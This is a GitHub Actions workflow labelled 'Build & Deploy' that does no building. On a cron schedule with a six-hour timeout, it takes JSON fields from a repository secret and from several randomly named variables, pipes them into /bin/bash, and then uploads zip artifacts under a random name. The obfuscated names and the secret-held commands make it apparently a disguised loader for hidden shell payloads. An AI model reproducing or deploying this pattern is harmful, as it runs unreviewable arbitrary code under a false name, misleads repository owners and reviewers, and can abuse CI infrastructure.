name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '39 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          nrt56: ${{ secrets.nrt56 }}
        run: |
          printf '%s' "$nrt56" | jq -r .c1 | /bin/bash
          printf '%s' "$si969" | jq -r .eki998 | /bin/bash
          echo $kfn48985 | jq -r .emg8155 | /bin/bash
          printf '%s' "$iz05444" | jq -r .x22205 | /bin/bash
          printf '%s' "$l0" | jq -r .rg05718 | /bin/bash
          printf '%s' "$sqqnv15" | jq -r .h3862 | /bin/bash
          echo $u860 | jq -r .rfp57 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: BWTIlosT
          path: "*.zip"
          retention-days: 1
